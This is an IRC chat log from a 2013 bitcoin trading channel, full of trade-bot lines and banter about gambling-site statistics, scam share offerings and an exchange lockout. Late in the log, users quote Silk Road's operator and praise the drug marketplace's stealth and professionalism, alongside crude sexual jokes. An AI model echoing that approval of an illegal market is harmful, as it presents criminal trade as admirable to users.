Sep 21 12:49:57 people with a shot at making it. Sep 21 12:56:17 what? Sep 21 13:03:30 [BTCTC] [LABCOIN] 9000 @ 0.00167632 = 15.0869 BTC [+] {12} Sep 21 13:05:27 im sorry, i read "how many". Sep 21 13:07:33 we already have a well known fraction reserve bitcoin bank called "ripple" amont others Sep 21 13:13:41 [MPEX] [S.MPOE] 574 @ 0.00093429 = 0.5363 BTC [+] Sep 21 13:16:58 It's not necessarily fractional... but it can be. Depends who owns you bitcoins. Sep 21 13:17:25 that's true of every service accepting bitcoin deposits Sep 21 13:17:42 For example, if you hold BitStamp BTC debt, it's probable it's not fractional. If you hold from just anyone, it's almost 100% sure. Sep 21 13:18:02 Yes, any service with a balance could be fractional. Sep 21 13:18:07 True enough. Sep 21 13:19:05 at least ripple could allow you to trade 1.1 mtgox btc for 1 bitstamp btc ;) Sep 21 13:22:34 i do not disagree with your assertions Sep 21 13:25:37 i was merely commenting that ripple's debt model is a direct facilitator of fractional reserve for all one might trust Sep 21 13:27:02 more like an extraction engine designed to encourage people to make trust mistakes. Sep 21 13:27:40 isn't that the usual savvy vs unsavvy? Sep 21 13:33:00 [BTCTC] [FN] [DMS.SELLING] 150 @ 0.007193 = 1.079 BTC [+] {2} Sep 21 13:34:29 this fn 2 shit is annoying Sep 21 13:37:55 random_cat seems to me it's not, in the sense dumping poison gas in tokyo subway ism't the usual fit vs unfit. Sep 21 13:39:57 what were they called again? aum something Sep 21 13:40:46 can we call it dropping syringes used for heroin and/or coke injection instead, mircea_popescu? That would seem to fit better. Sep 21 13:41:09 aite, except you don't really inject coke Sep 21 13:41:17 gangplank i think it was aum Sep 21 13:43:12 meanwhile back at the ranch : http://edition.cnn.com/2013/09/19/us/louisiana-brain-amoeba-water-supply/index.html Sep 21 13:43:46 that's what happens at the end of the continent's sewer Sep 21 13:56:31 https://bitcointalk.org/index.php?topic=294218.msg3153366#msg3153366 Sep 21 13:56:36 Help bring peace with your money Sep 21 13:56:43 oh wow... crazy dank is getting crazier by the day. Sep 21 13:57:59 His posts are now reading like 4chan stories. Sep 21 14:00:15 i wonder if this is his confused bid to get laid. Sep 21 14:00:28 "dude out of a million chicks i gotta get lucky" Sep 21 14:01:51 I assume since he was in the past coherent he's either a troll who stole money and now is just trolling hard. Or he was already slightly paranoid and the threats made his mind dive where it could not return. Sep 21 14:02:09 Troll being much more plausible, I'll go with that. Sep 21 14:02:57 His writing would be enough to give someone an aneurysm. Sep 21 14:04:14 The Tale of Dank, an autobiography explaining my life and helping you understand and believe in it. Sep 21 14:04:43 (drugs of interpretation not included) Sep 21 14:04:44 "Dank, I had a dream that you returned to me the million dollars that I loaned to you in my other dream. " Sep 21 14:04:56 ahaha that thread delivers. Sep 21 14:05:07 It does, it does Sep 21 14:05:50 (what I thought would happen is they would kill me, bitcoin forum would take notice, world takes notice, economy collapses and society breaks down for a concert to be organized. I would descend from the sky, like a UFO and bring peace.) Sep 21 14:06:52 It's a madman's soup of text Sep 21 14:08:52 "I'd say we are equal. Actions do speak louder than words, which is why you will all believe me when I float at the concert, just as St. Joseph and Yogi Pullavar did. I know someone personally who has floated and I know someone who has witnessed their iPhone float." Sep 21 14:09:08 I feel high just reading this Sep 21 14:09:22 lmao Sep 21 14:11:38 [HAVELOCK] [CBTC] 10000 @ 0.00039998 = 3.9998 BTC [+] {3} Sep 21 14:12:39 [HAVELOCK] [CBTC] 899 @ 0.00039998 = 0.3596 BTC [+] {4} Sep 21 14:13:46 His signature says: "Currently seeking plot of land to host 1,000,000+ person music festivalDank Dream 2012 - Leave fear for love" Sep 21 14:14:13 Let me just say, so you know. They total amount you laugh at me in your lifetime for my beliefs, you will laugh at yourself when I float. Sep 21 14:14:22 dude, if this guy floated i'd still laugh at him. Sep 21 14:14:46 It would be hilarious. Sep 21 14:14:55 Should I get him a fenced field, put him in it, and you know, let him run free? Sep 21 14:15:47 He could graze in it and sing to a crowd of spirits. Sep 21 14:19:14 how's that different from current situation ? Sep 21 14:19:46 [BTCTC] [ASICMINER-PT] 10 @ 1.70079999 = 17.008 BTC [-] {3} Sep 21 14:20:22 He wouldn't be able to beg for money on the forum. Sep 21 14:21:02 "Dude read this thing.. dont move this shit it is completely nuts. You should make this post the home page Sep 21 14:21:02 Sep 21 14:21:11 Says sublime Sep 21 14:21:26 Yes, that might be an accurate representation of bitcointalk.org Sep 21 14:28:09 Hmm, well I'm off. Enough crazy reads for today. Sep 21 14:45:10 [BTCTC] [TAT.NEOBEE] 70 @ 0.003 = 0.21 BTC [+] Sep 21 14:50:15 [BTCTC] [ASICMINER-PT] 17 @ 1.75747058 = 29.877 BTC [+] {7} Sep 21 14:52:18 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [-] Sep 21 14:54:20 [BTCTC] [TAT.NEOBEE] 3750 @ 0.003 = 11.25 BTC [+] Sep 21 14:57:23 [BTCTC] [TAT.NEOBEE] 100 @ 0.003 = 0.3 BTC [+] Sep 21 15:00:26 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Sep 21 15:05:31 [BTCTC] [TAT.NEOBEE] 50 @ 0.003 = 0.15 BTC [+] Sep 21 15:13:39 [BTCTC] [TAT.NEOBEE] 332 @ 0.003 = 0.996 BTC [+] Sep 21 15:23:49 [BTCTC] [FN] [BTC-GROWTH] 7 @ 0.09430714 = 0.6601 BTC [-] {3} Sep 21 15:29:55 [BTCTC] [TAT.NEOBEE] 2589 @ 0.00299349 = 7.7501 BTC [-] {7} Sep 21 15:31:57 [BTCTC] [LABCOIN] 990 @ 0.001698 = 1.681 BTC [+] Sep 21 15:33:59 [BTCTC] [LABCOIN] 3010 @ 0.00169989 = 5.1167 BTC [+] {4} Sep 21 15:39:04 [BTCTC] [LABCOIN] 557 @ 0.00171 = 0.9525 BTC [+] Sep 21 15:39:27 looks like 'nakowa' has won 8,000 BTC from just-dice.com 4,000 in the last 2 days. insane. Sep 21 15:40:24 crazy. Sep 21 15:41:08 never seen anything like it Sep 21 15:41:20 my investment down 200 btc because of this guy Sep 21 15:41:43 what's the site stats like ? Sep 21 15:41:52 and if he stops, it will be months before it recovers Sep 21 15:42:20 1,250,000 BTC wagered. profit is around 0.2% Sep 21 15:42:31 house edge is 1%... so he's beating the bank Sep 21 15:48:54 so site is up about 4k atm ? Sep 21 15:49:19 or was it slighlty under EV even before he started. Sep 21 15:49:40 it was already under Sep 21 15:49:59 thanks to nakowa's past bets I guess Sep 21 15:50:03 fractal: nop, you're wrong Sep 21 15:50:24 pankkake: glad to see you're down on your just-dice investment. made my day. Sep 21 15:50:27 this is well within statistical variance Sep 21 15:50:37 probably need 100 million wagered to converge close to 1% Sep 21 15:50:58 Scrat what is he wrong about ? Sep 21 15:51:07 that it's broken Sep 21 15:51:13 he said that ? Sep 21 15:51:26 Scrat: no. the site profit is 1% if you take away all of nakowa's bets. only nakowa is beating the bank Sep 21 15:51:31 "beating the bank" Sep 21 15:51:43 that just means someone is winning, doesn't mean it's broken Sep 21 15:51:58 at least that's what i read in it. Sep 21 15:52:01 fractal: yes since if you take away his bets you're left with 0.00001 shitty bets and the law of large numbers Sep 21 15:52:03 you dont need 100million wagered for 1%. its the number of bets that matters not amount wagered... take away nakowa and the site is OVER 1% Sep 21 15:52:09 Nakowa is also the only gambler with a bankroll of that magnitude. So him having a lucky streak significantly offsets the sites overall stats. Sep 21 15:52:14 which he doesnt obey because he is doing a few hundrend 400 bets Sep 21 15:52:31 not even a hundred Sep 21 15:52:34 scrat: of course. and he won't stick around to bet more... he says he is cashing out and never playing again Sep 21 15:52:54 fractal: He said that before after his first big run. Sep 21 15:53:05 thats irrelevant Sep 21 15:53:07 he must have bet LetsDice IPO money. maybe I should have invested in there :D Sep 21 15:53:18 [BTCTC] [LABCOIN] 2750 @ 0.00171 = 4.7025 BTC [+] Sep 21 15:53:35 ' I pm doog in the forum, told him how to help me rain. I'm done here. Bye! I'll be truly miss you and here."' Sep 21 15:53:49 pankkake: keep investing in just-dice when nakowa plays, hopefully you'll lose more money. Sep 21 15:54:16 he's delusional and he thinks that past losses influence future wins Sep 21 15:54:20 statistics fail Sep 21 15:55:39 fractal: I've had a guy go +135 on my website spamming 3 btc on the 50% Sep 21 15:55:48 now multiply 135 by (400 / 3) Sep 21 15:56:27 Scrat: whats your site? Sep 21 15:56:39 https://coinroll.it Sep 21 15:58:10 it was around a 3sigma deviation Sep 21 15:58:14 Scrat: whats the psychology of someone who plays at your site instead of just-dice? why would they do it? Sep 21 15:58:16 which was way luckier than nakowa Sep 21 15:59:24 [BTCTC] [DMS.MINING] 754 @ 0.00182017 = 1.3724 BTC [-] {7} Sep 21 15:59:53 http://www.theguardian.com/technology/2013/sep/20/websites-pornography-block-cash Sep 21 15:59:56 Plan to block payments to websites that allow children to view pornography | Technology | theguardi Sep 21 16:02:27 fractal: because some people like it for smaller bets, derp Sep 21 16:02:33 pankkake: stop spamming the chat. thanks. Sep 21 16:02:41 also instant deposits Sep 21 16:02:55 Scrat: just-dice also has instant deposits Sep 21 16:03:11 * inputs.io required Sep 21 16:03:28 [HAVELOCK] [NEOBEE] 1000 @ 0.003 = 3 BTC [-] Sep 21 16:03:29 people generally like variety in their gambling. Sep 21 16:03:34 oh you take 0 confirm deposits? Sep 21 16:05:30 [BTCTC] [FN] [DMS.PURCHASE] 150 @ 0.009251 = 1.3877 BTC [-] Sep 21 16:10:35 [MPEX] [S.MPOE] 12600 @ 0.00093664 = 11.8017 BTC [+] {2} Sep 21 16:14:39 [HAVELOCK] [CBTC] 1536 @ 0.00038352 = 0.5891 BTC [-] {4} Sep 21 16:16:39 so what do you guys think about NEOBEE? Sep 21 16:16:40 [BTCTC] [LABCOIN] 4100 @ 0.00155411 = 6.3719 BTC [-] {12} Sep 21 16:21:57 yttr ThickAsThieves' thing Sep 21 16:22:11 huh? Sep 21 16:22:22 oh that's TAT's deal? Sep 21 16:22:35 I saw it was tat.neobee on btct.co Sep 21 16:23:08 he has his paws everywhere Sep 21 16:23:14 how long until TAT.EARTH Sep 21 16:23:23 or tat.urmom Sep 21 16:23:35 fuck Sep 21 16:23:37 :/ Sep 21 16:23:40 lol Sep 21 16:29:53 "my name is basil williams a lawyer by profession , i sent an Sep 21 16:29:53 email to you a few months ago and i was not sure you got it that is Sep 21 16:29:53 why i am sending you this mail once again, regarding the transfer of Sep 21 16:29:53 4.5 million euros to an offshore account" Sep 21 16:30:22 dude i'm fucking rich. all you bitchez wish you were as rich as me with my 4.5 million euros and basil williams, Pricipal Attorny Sep 21 16:31:55 [BTCTC] [ASICMINER-PT] 2 @ 1.7305 = 3.461 BTC [+] {2} Sep 21 16:32:10 always liked that name, Basil Sep 21 16:33:52 we use that name too but for females Sep 21 16:34:02 aka Bazilika Sep 21 16:34:50 is -ika, like -ina, inha, etc, dimunitive, I think it's called Sep 21 16:35:36 not in this case Sep 21 16:35:43 my little kakobreklika Sep 21 16:35:46 basilica just means church Sep 21 16:35:53 in people languages. Sep 21 16:36:00 [BTCTC] [LABCOIN] 3000 @ 0.0015378 = 4.6134 BTC [-] {5} Sep 21 16:36:01 i would be kakobreklca Sep 21 16:36:03 and it'd prolly be kakobreklichka Sep 21 16:36:22 lol Sep 21 16:36:26 yes well Sep 21 16:36:29 that works too Sep 21 16:36:31 :D Sep 21 16:36:35 but ch = c Sep 21 16:38:02 [BTCTC] [ACTIVEMINING] 291 @ 0.00190505 = 0.5544 BTC [-] {4} Sep 21 16:40:04 [BTCTC] [TAT.NEOBEE] 2990 @ 0.003 = 8.97 BTC [+] Sep 21 16:41:05 [HAVELOCK] [NEOBEE] 146 @ 0.003 = 0.438 BTC [-] Sep 21 16:44:08 [BTCTC] [TAT.ASICMINER] 15 @ 0.01645666 = 0.2468 BTC [+] {2} Sep 21 16:50:14 [BTCTC] [TAT.ASICMINER] 18 @ 0.01646 = 0.2963 BTC [+] Sep 21 16:50:14 [BTCTC] [BASIC-MINING] 5 @ 0.11926 = 0.5963 BTC [+] {2} Sep 21 16:52:16 [HAVELOCK] [NEOBEE] 1074 @ 0.003 = 3.222 BTC [-] Sep 21 16:52:17 [BTCTC] [TAT.ASICMINER] 26 @ 0.01646 = 0.428 BTC [+] Sep 21 16:54:09 btw tactm did reply to my question about the BTC volume for Gox in August, with a clarification question. I clarified and he never responded again. He did seem a little proturbed... Sep 21 16:54:38 perturbed Sep 21 16:54:56 prolly busy Sep 21 17:03:27 [HAVELOCK] [B] [XBOND] 100 @ 0.0012725 = 0.1273 BTC [-] Sep 21 17:14:38 [BTCTC] [TAT.ASICMINER] 28 @ 0.01646 = 0.4609 BTC [+] Sep 21 17:21:45 [BTCTC] [ASICMINER-PT] 4 @ 1.7135 = 6.854 BTC [-] {4} Sep 21 17:22:46 [BTCTC] [ASICMINER-PT] 6 @ 1.702 = 10.212 BTC [-] Sep 21 17:23:47 [BTCTC] [TAT.NEOBEE] 5710 @ 0.003 = 17.13 BTC [+] Sep 21 17:27:51 [BTCTC] [LABCOIN] 389 @ 0.00166398 = 0.6473 BTC [+] {2} Sep 21 17:30:54 [BTCTC] [ASICMINER-PT] 2 @ 1.7085 = 3.417 BTC [+] {2} Sep 21 17:33:03 hi Sep 21 17:36:02 someone here could anwer question about bitbet? Sep 21 17:36:19 ask away Sep 21 17:38:19 it is possible that the bet i placed was not received? Sep 21 17:38:56 how long since you sent the coins? Sep 21 17:39:42 2013-09-07 16:41:16 Sep 21 17:41:21 i didn't checked till today and now realize that bet was not posted Sep 21 17:41:50 actually better question is which address did you use, you can pm me if you want to keep it private Sep 21 17:42:13 ok **** BEGIN LOGGING AT Sat Sep 21 21:26:46 2013 Sep 21 21:27:22 i like how she boosts liquidity by flooding a PT that has an empty bid book Sep 21 21:29:04 who that ? Sep 21 21:29:16 "I've just offered 500 CIPHERMINE-PT (some of my personal shares) at a knock-down price of 0.05 BTC/share. I personally remain convinced that CipherMine's share price will recover to its earlier levels within the next month or two as our armada of ASICs get rolled out so this is a good chance for you to get in on the action. I don't intend to do many offerings like this at below market Sep 21 21:29:16 rate, but I see it as in my interests as main shareholder to boost liquidity and make the pass-thru a success." Sep 21 21:29:22 Kate from Ciphermine Sep 21 21:29:25 https://bitcointalk.org/index.php?topic=283947.msg3205490#msg3205490 Sep 21 21:29:40 waitwut Sep 21 21:29:41 lol Sep 21 21:29:49 [BTCTC] [DMS.MINING] 127 @ 0.00165 = 0.2096 BTC [-] Sep 21 21:30:12 roughly 20% below market price too Sep 21 21:31:16 so basically the entire plan failed and she's late on rent. Sep 21 21:31:23 yet another wannabe-scam in the red. Sep 21 21:31:51 [BTCTC] [TAT.ASICMINER] 52 @ 0.015375 = 0.7995 BTC [+] {2} Sep 21 21:31:52 gotta love the free market. the only method to organise a bunch of retards with a sprinkle of sanity into something that regularly wrecks the best laid out scamplans. Sep 21 21:33:54 I never followed cypermine somehow. they're litecoin miners? Sep 21 21:35:16 my best performing litecoin asset is a PMB, who would have guessed? Sep 21 21:35:37 it's basically a mining farm fund of whatever type they whimsy toward that day Sep 21 21:37:57 [BTCTC] [ASICMINER-PT] 1 @ 1.684 BTC [-] Sep 21 21:39:59 [BTCTC] [ASICMINER-PT] 1 @ 1.684 BTC [-] Sep 21 21:40:30 https://bitcointalk.org/index.php?topic=298905.msg3204972;topicseen#new Sep 21 21:40:34 Open Investigation into Just-Dice/Dooglus Sep 21 21:41:00 [MPEX] [S.MPOE] 14400 @ 0.00094307 = 13.5802 BTC [+] Sep 21 21:41:20 more idiocy Sep 21 21:41:48 the guy doesn't understand the internet basically Sep 21 21:42:01 [BTCTC] [ASICMINER-PT] 1 @ 1.684 BTC [-] Sep 21 21:42:18 Just-Dice & Towtoad were registered a week between each other. Meaning Celeste/Nakowa had already planned on releasing a dice site BEFORE he won the excessive money from JD? It sounds like planning ahead to me... planning ahead a ponzi Sep 21 21:42:26 this is kinda iffy reasoning. Sep 21 21:42:44 yep Sep 21 21:42:47 i mean... this girl i'm banging was born in '87 ? sounds like at the time i didn't even speak english Sep 21 21:42:51 sounds like planning ahead to me... Sep 21 21:43:07 sounds like planning a... hm. is it a ponzi if she likes to suck it ? Sep 21 21:43:15 like if you were born on the same date as Hitler, you should be shot Sep 21 21:43:52 i tihnk that's actually how that worked. Sep 21 21:44:03 the blessing of being contemporary to idiots. Sep 21 21:45:04 [BTCTC] [ACTIVEMINING] 665 @ 0.00193097 = 1.2841 BTC [-] {2} Sep 21 21:53:17 so in GTA IV these uncut diamonds, of course stolen between some 20 parties, come in on the boat with you. then it becomes a game of "who ends up with the diamonds". Sep 21 21:53:37 In the end the diamonds get thrown into a garbage truck, and no one is able to find them. Sep 21 21:53:49 So a hobo ends up finding them in the end as if he won the lottery. Sep 21 21:54:36 The hobo I think starts some shady ass business. Sep 21 21:55:21 is this a film ? Sep 21 21:55:27 no this is a game Sep 21 21:55:46 the narrative qualities make the story play out like a film Sep 21 21:56:50 "Atlantis was good for Silk Road and the community at large and I am sad to see it go. Yes they were a bit cocky and aggressive, but they never crossed the line and did anything unethical, and they served their customers well. They reminded us in the Silk Road administration that to stay #1, we have to be constantly thinking of our users and how to serve them best and can not take for Sep 21 21:56:50 granted your loyalty. Sep 21 21:56:50 There has been more than one occasion where I have wanted to quit as well. Without going into details, the stress of being DPR is sometimes overwhelming. What keeps me going is the understanding that what we are doing here is more important than my insignificant little life. I believe what we are doing will have rippling effects for generations to come and could be part of a monumental Sep 21 21:56:50 shift in how human beings organize and relate to one another. Sep 21 21:56:50 I have gone through the mental exercise of spending a lifetime in prison and of dying for this cause. I have let the fear pass through me and with clarity commit myself fully to the mission and values outlined in the Silk Road charter. If you haven’t read it yet, please do. " ~DPR Sep 21 21:57:16 :P Sep 21 21:57:50 To be honest though. Sep 21 21:58:16 ;;ticker Sep 21 21:58:16 MtGox BTCUSD ticker | Best bid: 132.51001, Best ask: 133.27000, Bid-ask spread: 0.75999, Last trade: 132.50300, 24 hour volume: 5009.17739557, 24 hour low: 132.00000, 24 hour high: 136.00000, 24 hour vwap: 134.05665 Sep 21 21:58:17 [BTCTC] [TAT.NEOBEE] 100 @ 0.003 = 0.3 BTC [+] Sep 21 21:58:33 Silk Road vendors make the rest of bitcoin world look like a scam. Sep 21 21:59:00 bitcoin looks like a scam just fine on its own Sep 21 21:59:19 They use GPG keys for all orders. Self destruction for shipping information. The Vendors all act like professionals, and provide excellent customer support. Sep 21 21:59:26 The stealth is magnificient Sep 21 21:59:44 I think the climate DPR has created on silk road is absolutely phenomenal. Sep 21 21:59:52 The only other comparator is perhaps MPEx. Sep 21 22:00:08 ThickAsThieves dpr, possibly the only guy really into btc. Sep 21 22:07:26 [HAVELOCK] [CBTC] 657 @ 0.00039995 = 0.2628 BTC [-] {5} Sep 21 22:10:30 [MPEX] [S.MPOE] 11900 @ 0.00094256 = 11.2165 BTC [-] {2} Sep 21 22:10:45 if anyone is looking for things to say to noobs, may i humbly propose https://bitcointalk.org/index.php?topic=298905.msg3205724#msg3205724 for your consideration. Sep 21 22:12:31 [HAVELOCK] [B] [XBOND] 543 @ 0.00129183 = 0.7015 BTC [+] {3} Sep 21 22:14:17 http://bitbet.us/bet/495/there-will-be-blood/ Sep 21 22:14:22 BitBet - There will be blood Sep 21 22:14:33 [HAVELOCK] [B] [XBOND] 447 @ 0.00132898 = 0.5941 BTC [+] {4} Sep 21 22:15:19 seems like nice pots. Sep 21 22:15:27 I don't know what this bet is about - it refers to things I have never heard of - but I am betting "no" since the odds are so skewed. Why put 10 on something against nothing? - Random User Sep 21 22:15:35 Which relates back to your n00b post. Sep 21 22:15:43 Examples be everywher eyo Sep 21 22:16:35 [HAVELOCK] [CBTC] 1491 @ 0.000427 = 0.6367 BTC [+] Sep 21 22:17:22 intesting, the payouts are still worth it for this bet Sep 21 22:22:41 [HAVELOCK] [NEOBEE] 67 @ 0.003 = 0.201 BTC [-] Sep 21 22:25:26 true. Sep 21 22:25:55 at least betting is supposed to be leisure, as opposed to investing which is theoretically work Sep 21 22:27:36 it's pretty similar. you think you know the future Sep 21 22:30:11 ya, but it's one thing to think you know the future and recount it to some chick during post coital bliss as an exercise in humorous fantastic creativity, Sep 21 22:30:35 and it's quite another thing to think you know the future and recount it to a bunch of sexually frustrated men in uniform as an exercise in solving the world's imagined problems Sep 21 22:32:55 I wasn't aware betting was like that. I should bet more Sep 21 22:33:34 lol Sep 21 22:41:14 why does btct say "access temporarily denied"? Sep 21 22:41:45 there was no announcement, so nobody knows. Sep 21 22:41:59 meanwhile, have a laser dog : http://upload.wikimedia.org/wikipedia/commons/9/94/Black-Lab-3-months-old-puppy.jpg Sep 21 22:42:09 so this affects everyone? Sep 21 22:42:46 afaik. Sep 21 22:42:54 No, it's some sort of protection-mechanism that kicks in when multiple failed logins have been made on the account, locks you out for a while. Sep 21 22:43:10 Somewhere someone is trying to bruteforce your account. If the mechanism is working properly, that is. Sep 21 22:43:20 Wait 5-10 minutes, it'll be gone. Sep 21 22:44:02 [BTCTC] [LABCOIN] 1005 @ 0.00159989 = 1.6079 BTC [+] {3} Sep 21 22:45:29 well, that's comforting.... Sep 21 22:46:40 It sucks, I have no idea why it doesn't lock people out by IP when they try to bruteforce an account. Sep 21 22:49:07 [BTCTC] [ASICMINER-PT] 1 @ 1.704 BTC [+] Sep 21 22:49:50 it doesn't seem too credible a theory to me. for one thing, why would someone bruteforcing an account stop. Sep 21 22:49:57 for the other thing, why would they be using your ip Sep 21 22:50:11 for the third, why would someone continue with the same process long after the supposed defense was installed. Sep 21 22:50:16 maybe I just typed my 2-auth wrong. Sep 21 22:50:28 well did you ? Sep 21 22:50:40 too late to check now, the code has changed. Sep 21 22:50:46 It gives a different error when you mistype 2FA, done that before. Sep 21 22:50:48 so listen, sometime verify this. Sep 21 22:50:52 a ok. Sep 21 22:51:03 ok. Sep 21 22:51:19 But this error does come from consecutive failed logins, burnside has mentioned this in the BTC-TC thread on bitcointalk Sep 21 22:51:33 Since several other people have run into the same thing. Sep 21 22:53:11 [HAVELOCK] [NEOBEE] 333 @ 0.003 = 0.999 BTC [-] Sep 21 22:53:52 saulimus did you have consecutive failed logins ? Sep 21 22:54:10 no, I tried to login once, got the message Sep 21 22:54:43 well who knows. Sep 21 22:55:56 "That happens either when someone has been trying to hack your account or you've pissed off our DDoS filter" from Burnside @ https://bitcointalk.org/index.php?topic=125629.msg3151374;topicseen#msg3151374 Sep 21 23:06:24 [HAVELOCK] [NEOBEE] 322 @ 0.003 = 0.966 BTC [-] Sep 21 23:16:54 of the total outstanding ActM shares how many were sold for .0025 in the most recent ipo? Sep 21 23:19:51 when was that most recent ipo ? Sep 21 23:22:59 I am not familiar with the asset and am trying to find information now. I read in this post that the ipo was all messed up: https://bitcointalk.org/index.php?topic=254930.msg2714039#msg2714039 . They do not say when this happened or the share counts however :( Sep 21 23:23:41 [HAVELOCK] [VTX] 2 @ 0.54 = 1.08 BTC [-] Sep 21 23:23:50 ok, here Sep 21 23:24:10 !t btct activemining Sep 21 23:24:11 [BTCT:ACTIVEMINING] 1D: 0.001509 / 0.00175 / 0.001979 (24472 shares, 42.9 BTC), 7D: 0.001401 / 0.00214 / 0.0029 (266315 shares, 570.5 BTC), 30D: 0.001401 / 0.00387 / 0.006998 (1790736 shares, 6933 BTC) Sep 21 23:24:27 so if that latest ipo was in the past 30 days, no more than 7k btc. Sep 21 23:24:42 [BTCTC] [TAT.ASICMINER] 16 @ 0.01538 = 0.2461 BTC [-] Sep 21 23:25:43 [HAVELOCK] [VTX] 1 @ 0.5006 BTC [-] Sep 21 23:25:53 the post is answering your question. 0.0005 × 5,000,000 + 0.0025 × 20,000,000 Sep 21 23:25:53 wait no Sep 21 23:26:31 I am trying to find out how many of the shares were initially sold for .0005 vs how many went for .0025 Sep 21 23:26:39 I will need to dig further Sep 21 23:26:44 [HAVELOCK] [VTX] 8 @ 0.50000001 = 4 BTC [-] Sep 21 23:27:03 most were for 0025 Sep 21 23:27:04 PqcUy2 you have a decent shot at finding it in the chan logs, Sep 21 23:27:19 seeing how iirc activescam is ulterior to the website log being made available. Sep 21 23:28:02 Thank you for the assistance :) Sep 21 23:32:50 [BTCTC] [TAT.ASICMINER] 162 @ 0.01539604 = 2.4942 BTC [+] {2} Sep 21 23:39:57 [BTCTC] [TAT.NEOBEE] 500 @ 0.003 = 1.5 BTC [+] Sep 21 23:43:00 [HAVELOCK] [B] [XBOND] 519 @ 0.00127045 = 0.6594 BTC [-] {3} Sep 21 23:43:01 [MPEX] [S.MPOE] 4100 @ 0.00093541 = 3.8352 BTC [-] Sep 21 23:44:01 [BTCTC] [LABCOIN] 88 @ 0.00164994 = 0.1452 BTC [+] {2} Sep 21 23:45:02 [HAVELOCK] [B] [XBOND] 360 @ 0.00127 = 0.4572 BTC [-] {2} Sep 21 23:46:22 I assume the + / - beside those indicate a buy or sell but what does the {#} mean? Sep 21 23:47:19 the + - indicate relation to previous price Sep 21 23:47:30 the # is how many individually reported trades were aggregated into the line Sep 21 23:47:45 Thank you Sep 21 23:51:08 [HAVELOCK] [B] [XBOND] 1159 @ 0.00120689 = 1.3988 BTC [-] {7} Sep 21 23:52:09 [HAVELOCK] [B] [XBOND] 5000 @ 0.0012 = 6 BTC [-] {2} Sep 21 23:56:13 [BTCTC] [TAT.ASICMINER] 380 @ 0.01661257 = 6.3128 BTC [+] {14} Sep 21 23:58:15 [HAVELOCK] [AM100] 37 @ 0.01652702 = 0.6115 BTC [+] {2} Sep 21 23:59:17 [HAVELOCK] [AM100] 40 @ 0.016625 = 0.665 BTC [+] {2} Sep 22 00:03:21 [BTCTC] [TAT.NEOBEE] 50 @ 0.003 = 0.15 BTC [+] Sep 22 00:12:30 [BTCTC] [TAT.NEOBEE] 600 @ 0.00299 = 1.794 BTC [-] Sep 22 00:24:41 [BTCTC] [LABCOIN] 1200 @ 0.00165368 = 1.9844 BTC [+] {3} Sep 22 00:31:48 [BTCTC] [B] [CIPHERMINE.B1] 300 @ 0.01054 = 3.162 BTC [+] Sep 22 00:41:58 [BTCTC] [B] [CIPHERMINE.B1] 100 @ 0.01054 = 1.054 BTC [+] Sep 22 00:43:53 mhm interesting happenings on AWS..spot prices for north virginia jumped about 2x last 2 weeks Sep 22 00:44:43 so now they are more expensive than in other zones Sep 22 00:45:35 someone madly mining something or it's just me? Sep 22 00:53:28 what's aws ? Sep 22 00:53:51 amazon web services... teh cloud Sep 22 00:56:12 [BTCTC] [DMS.MINING] 4041 @ 0.00177552 = 7.1749 BTC [+] {7} Sep 22 00:57:01 o o Sep 22 00:57:17 isn't virginia where nsa does its computing / Sep 22 00:57:50 amazon has separate cloud for govt, aptly named "GovCloud" Sep 22 00:58:23 but it's possible nsa gobbled it and needs moar :) Sep 22 01:01:34 http://d36cz9buwru1tt.cloudfront.net/solutions/publicsector/govcloud-region.jpg totaly some intern Sep 22 01:06:22 [HAVELOCK] [AM100] 9 @ 0.01679 = 0.1511 BTC [+] Sep 22 01:08:24 [BTCTC] [TAT.NEOBEE] 500 @ 0.003 = 1.5 BTC [+] Sep 22 01:08:25 [HAVELOCK] [AM100] 43 @ 0.0169 = 0.7267 BTC [+] Sep 22 01:11:27 [BTCTC] [ACTIVEMINING] 5089 @ 0.00178529 = 9.0853 BTC [-] {12} Sep 22 01:11:28 [BTCTC] [ASICMINER-PT] 1 @ 1.704 BTC [+] Sep 22 01:12:29 [BTCTC] [ASICMINER-PT] 5 @ 1.712 = 8.56 BTC [+] {3} Sep 22 01:16:55 heh Sep 22 01:18:35 [BTCTC] [ASICMINER-PT] 1 @ 1.736 BTC [+] Sep 22 01:27:44 [BTCTC] [B] [CIPHERMINE.B1] 206 @ 0.01054878 = 2.173 BTC [+] {3} Sep 22 01:28:45 [BTCTC] [FIMB] 790 @ 0.01101012 = 8.698 BTC [+] {2} Sep 22 01:48:04 [HAVELOCK] [B] [XBOND] 600 @ 0.00129979 = 0.7799 BTC [-] {2} Sep 22 01:49:05 [BTCTC] [B] [CIPHERMINE.B1] 94 @ 0.01065 = 1.0011 BTC [+] Sep 22 01:51:07 [BTCTC] [BASIC-MINING] 5 @ 0.12 = 0.6 BTC [+] Sep 22 01:52:08 [BTCTC] [PETA-MINE] 1 @ 0.6547 BTC [+] Sep 22 01:55:10 [BTCTC] [FN] [BTC-GROWTH] 95 @ 0.09812431 = 9.3218 BTC [+] {3} Sep 22 02:01:16 [BTCTC] [TAT.NEOBEE] 50 @ 0.003 = 0.15 BTC [+] Sep 22 02:02:17 [HAVELOCK] [CBTC] 340 @ 0.0004 = 0.136 BTC [-] Sep 22 02:03:18 [BTCTC] [DMS.MINING] 221 @ 0.0018 = 0.3978 BTC [+] Sep 22 02:05:20 [BTCTC] [CB.IDIFF-E] 5 @ 0.02398 = 0.1199 BTC [-] Sep 22 02:09:24 [BTCTC] [FN] [DMS.PURCHASE] 43 @ 0.009178 = 0.3947 BTC [-] Sep 22 02:15:30 [BTCTC] [ASICMINER-PT] 1 @ 1.735 BTC [-] Sep 22 02:29:45 [BTCTC] [ASICMINER-PT] 1 @ 1.731 BTC [-] Sep 22 02:36:52 [HAVELOCK] [AM100] 17 @ 0.0169 = 0.2873 BTC [+] Sep 22 03:17:31 payment Sep 22 03:17:42 wrong channel Sep 22 03:21:54 https://bitcointalk.org/index.php?topic=298905.msg3206505#msg3206505 Sep 22 03:21:57 holy hell this is possible. Sep 22 03:22:00 Open Investigation into Just-Dice/Dooglus Sep 22 03:22:09 i might have to review my entire worldview now. Sep 22 03:22:28 http://world.time.com/2013/09/21/super-typhoon-usagi-set-to-hit-southern-china/ Sep 22 03:22:31 Super Typhoon Usagi Set to Hit Southern China | TIME.com Sep 22 03:22:46 it happens from time to time. those are the superior people Sep 22 03:23:19 admitting you were wrong is the only way to be always right :) Sep 22 03:27:22 